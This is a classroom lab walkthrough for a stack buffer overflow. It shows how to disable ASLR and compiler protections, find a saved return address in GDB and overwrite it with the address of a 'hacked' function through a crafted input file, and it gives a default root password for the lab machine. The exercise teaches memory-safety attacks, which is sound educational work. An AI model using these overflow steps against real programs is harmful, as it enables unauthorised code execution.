Step 1: Open Terminal
Step 2: Check and Turn off ASLR
Type:
cat /proc/sys/kernel/randomize_va_space
If return
0
, it means the ASLR have been turned off.
Otherwise, we need to manually turn it off.

To turn off ASLR:
Change to root user:
su root, default password is
chensi
Then type:
echo 0 > /proc/sys/kernel/randomize_va_space
Step 3: Compile the code
- Download the source code to a folder
- Compile the code, make sure to turn off DEP and StackGuard gcc lab1.c -o lab1 -m32 -fno-stack-protector -zexecstack
Step 4: Use GDB
- Open GDB and load program: gdb ./lab1
- Run the program: run
- You can now type some characters as input


- Disassemble
return_input
function: disas return_input
- Set a break point at the
ret
instruction: break *0x004005ad (note: you may have a different address)

- Re-Run the program: run
- This time, the program will stop at the
ret
instruction in return_input
, we know that the program will use the address stored on the stack to return back to the main
function in the next round.
- So before we let the program continue, let's first disassemble the
main
function: disas main

- We need to write down the return address (hightlighted in the screenshot):
0x004005ce
(note: you may have a different address)
- Next, we need to check the stack to see if this address
0x004005ce
is stored on the stack and we need to write down the stack address. Type: x/20x $esp

- As shown in the above picture, we can see that the return address
0x004005ce
has been stored on stack with address 0xbffff11c
- Disassemble
hakced
function: disas hacked

- Our goal is to change the return address (
0x004005ce
) stored on the stack to hacked
function's address 0x0040054d
Step 5: Prepare ShellCode
- Creat a new file in the same folder, and use an editor to edit it
- Add/remove some dummy characters to make sure we can overflow the return address on the stack (
0xbffff11c
)
- Your shellcode should looks like this: Some dummey characters + hacked function address (e.g.
0x0040054d
)
- The hacked function address (e.g.
0x0040054d
) should write in a little endian way (What is little endian?)
- Genrate the shellcode file using
Python2's print
function in terminal: python2 -c 'print "YOUR SHELLCODE"' > shellcode(Replace YOUR SHELLCODE with the actual shellcode

Step 6: Launch attack (success)
- Run the program with the shellcode as input: ./lab1 < shellcode

- If you see "Hacked by Si Chen", it means you successfully launched the attack. Now please change the output string in
lab1.c
to your name and re-compile/re-do the whole process again :)
Step 6: Launch attack (failed)
- Open GDB and load program again: gdb ./lab1
- Re-run the program in gdb use shellcode as input: run ./lab1 < shellcode
- Disassemble
return_input
function: disas return_input
- Set a break point at the
ret
instruction: break *0x004005ad (note: you may have a different address)

- Re-run the program in gdb use shellcode as input: run ./lab1 < shellcode
- This time, the program will stop at the
ret
instruction in return_input
, we know that the program will use the address stored on the stack to return back to the main
function in the next round.
- Next, we need to check the stack to see if the
hacked
address 0x0040054d
is stored on the stack with address 0xbffff11c
(note: you may have a different address) Type: x/20x 0xbffff11c (You can also check some adjacent addresses e.g. x/20x 0xbffff10c)
- If not, try to add/remove some dummy charaters in step 5 and re-generate the shellcode file